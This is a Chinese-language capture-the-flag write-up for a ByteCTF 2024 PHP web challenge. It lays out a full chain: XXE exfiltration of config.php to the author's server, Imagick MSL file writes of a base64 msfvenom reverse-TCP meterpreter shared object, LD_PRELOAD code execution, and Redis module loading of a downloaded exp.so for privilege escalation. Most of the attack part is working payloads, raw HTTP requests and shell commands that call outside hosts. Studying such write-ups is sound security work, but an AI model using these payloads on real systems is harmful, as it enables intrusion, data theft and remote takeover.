放个栗子镇贴先
这次被Harder师傅带飞了,不过大赛也终于不是零贡献值了
整体分析
<?php
ini_set("display_errors", "On");
include_once("config.php");
if (isset($_GET['so']) && isset($_GET['key'])) {
if (is_numeric($_GET['so']) && $_GET['key'] === $secret) { array_map(function($file) { echo $file . "\n"; }, glob('/tmp/*')); putenv("LD_PRELOAD=/tmp/".$_GET['so'].".so");
}
}
if (isset($_GET['byte']) && isset($_GET['ctf'])) { $a = new ReflectionClass($_GET['byte']); $b = $a->newInstanceArgs($_GET['ctf']);
} elseif (isset($_GET['clean'])){ array_map('unlink', glob('/tmp/*'));
} else { highlight_file(__FILE__);
echo 'Hello ByteCTF2024!';
}
// phpinfo.html` Hello ByteCTF2024!分析可知,要通过ld_preload加载恶意so
但前提是能通过php反射类↓
$a = new ReflectionClass($_GET['byte']);
$b = $a->newInstanceArgs($_GET['ctf']);上传so文件并且读取config.php的secret,并且执行能触发so文件的命令。
接下来结合phpinfo.html,发现存在远程包含和SimpleXML
理论存在,实践开始
SimpleXMLElement XXE
参考文章:2018 SUCTF Homework xxe外带数据~~ xxe进行ssrf_[suctf 2018]homework-CSDN博客
在vps上创建load.xml↓
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE try[
<!ENTITY % int SYSTEM "http://www.7ntsec.cn:8000/e.xml">
%int;
%all;
%send;
]>和
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://www.7ntsec.cn:8000/?%payl;'>">直接打?byte=SimpleXMLElement&ctf[]=http://www.7ntsec.cn:8000/load.xml&ctf[]=2&ctf[]=true
获得conifg.php内容
<?php
$secret = "HelloByteCTF2024";imagick 写文件 + ld_preload RCE
参考文章:深入浅出LD_PRELOAD & putenv() - 安全客,安全资讯平台 (anquanke.com)
和
https://aecous.github.io/2023/06/27/Imagick%E8%A7%A6%E5%8F%91msl/
首先看到的是0ctf的原题。利用imagick结合ld_preload进行提权
原理
参考TCTF2019 WallBreaker-Easy 解题分析 - 先知社区 (aliyun.com)
Imagecik库在加载一些冷门的图片格式如wmv,会调用外部命令ffpemg来实现
这样,结合对ffpemg进行ld_preload加载恶意so,就能实现rce。但是如何上传文件呢?
从msl资料可以知道,能通过filename标签配合data:// 伪协议实现写文件。那么理清步骤,实践开始
具体操作
传必要的so恶意文件
由于gcc编译so的payload太大,无法成功的写出来,我这里直接使用msf生成
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=8.134.221.106 lport=5555 -f elf-so > 3.so
cat 3.so | base64再结合php会把上传的文件优先保存到/tmp目录下,构造payload:
POST /?byte=Imagick&ctf[]=vid:msl:/tmp/php* HTTP/1.1
Host: a588f33e.clsadp.com
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3FMDC1bmmLUmX70G
Content-Length: 1033
------WebKitFormBoundary3FMDC1bmmLUmX70G
Content-Disposition: form-data; name="exec"; filename="exec.msl"
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="inline:data:text/8BIM;base64,f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAIAAAAAAACWAgAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5
AgAaCgiG3WpRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8
WGoBXw8FXmp+Wg8FSIXAeO3/5g==" />
<write filename="8BIM:/tmp/2.so" />
</image>
------WebKitFormBoundary3FMDC1bmmLUmX70G接下来写用于触发ffpemg命令调用
POST /?byte=Imagick&ctf[]=vid:msl:/tmp/php* HTTP/1.1
Host: a588f33e.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeTvfNEmqTayg6bqr
Content-Length: 681
------WebKitFormBoundaryeTvfNEmqTayg6bqr
Content-Disposition: form-data; name="123"; filename="exesc.msl"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="inline:data://image/x-portable-anymap;base64,UDYKOSA5CjI1NQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF8TzoxMzoiZnVtb19iYWNrZG9vciI6NDp7czo0OiJwYXRoIjtzOjExOiIvdG1wL0FlY291cyI7czo0OiJhcmd2IjtOO3M6NDoiZnVuYyI7TjtzOjU6ImNsYXNzIjtOO30=" />
<write filename="/tmp/ss.wmv" />
</image>
------WebKitFormBoundaryeTvfNEmqTayg6bqr--设置环境变量
GET /?key=HelloByteCTF2024&so=2 HTTP/1.1
Host: a588f33e.clsadp.com
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://828c8beb.clsadp.com/?byte=Imagick&ctf[]=php://input
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
触发so加载:
POST /?byte=Imagick&ctf[]=/tmp/ss.wmv HTTP/1.1
Host: ca7489ef.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeTvfNEmqTayg6bqr
Content-Length: 681
------WebKitFormBoundaryeTvfNEmqTayg6bqr
Content-Disposition: form-data; name="123"; filename="exesc.msl"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="inline:data://image/x-portable-anymap;base64,UDYKOSA5CjI1NQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF8TzoxMzoiZnVtb19iYWNrZG9vciI6NDp7czo0OiJwYXRoIjtzOjExOiIvdG1wL0FlY291cyI7czo0OiJhcmd2IjtOO3M6NDoiZnVuYyI7TjtzOjU6ImNsYXNzIjtOO30=" />
<write filename="/tmp/ss.wmv" />
</image>
------WebKitFormBoundaryeTvfNEmqTayg6bqr--redis后渗透提权
getshell了但是低权限
在start.sh下会发现开启了redis。于是在默认路径找到了redis.conf并且在里面发现了密码。
登录后
看上去不是主从复制,那就只剩恶意模块加载了
wget http://www.7ntsec.cn/exp.so
chmod +x exp.so
redis-cli -h 127.0.0.1 -p 6379 -a bytectfa0d90b
module load "/tmp/exp.so"成功提权
出了